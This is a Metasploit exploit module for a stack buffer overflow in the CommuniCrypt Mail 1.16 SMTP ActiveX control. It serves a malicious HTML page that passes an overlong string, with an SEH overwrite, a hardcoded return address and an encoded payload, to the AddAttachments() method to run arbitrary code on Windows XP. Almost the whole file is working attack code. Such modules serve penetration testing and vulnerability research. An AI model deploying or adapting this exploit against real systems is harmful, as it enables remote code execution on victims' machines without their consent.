##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the ANSMTP.dll/AOSMTP.dll
        ActiveX Control provided by CommuniCrypt Mail 1.16.  By sending an overly
        long string to the "AddAttachments()" method, an attacker may be able to
        execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Lincoln',  # Original exploit author
          'dookie'    # MSF module author
        ],
      'References'     =>
        [
          [ 'OSVDB', '64839' ],
          [ 'EDB', '12663' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'           => 1000,
          'BadChars'        => "\x00\x09\x0a\x0d'\\",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP Universal', { 'Offset' => 284, 'Ret' => 0x1001e41c } ], #p/p/r in AOSMTP.dll
        ],
      'DisclosureDate' => 'May 19 2010',
      'DefaultTarget'  => 0))
  end

  def autofilter
    false
  end

  def check_dependencies
    use_zlib
  end

  def on_request_uri(cli, request)
    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    # Randomize some things
    vname   = rand_text_alpha(rand(100) + 1)
    strname = rand_text_alpha(rand(100) + 1)

    filler  = rand_text_alpha(target['Offset'])
    seh     = generate_seh_payload(target.ret)
    trailer = rand_text_alpha(1000 - p.encoded.length)
    sploit  = filler + seh + p.encoded + trailer

    # Build out the message
    content = %Q|<html>
<object classid='clsid:F8D07B72-B4B4-46A0-ACC0-C771D4614B82' id='#{vname}'></object>
<script language='javascript'>
var #{vname} = document.getElementById('#{vname}');
var #{strname} = new String('#{sploit}');
#{vname}.AddAttachments(#{strname});
</script>
</html>
|

    print_status("Sending #{self.name}")

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    handler(cli)
  end
end
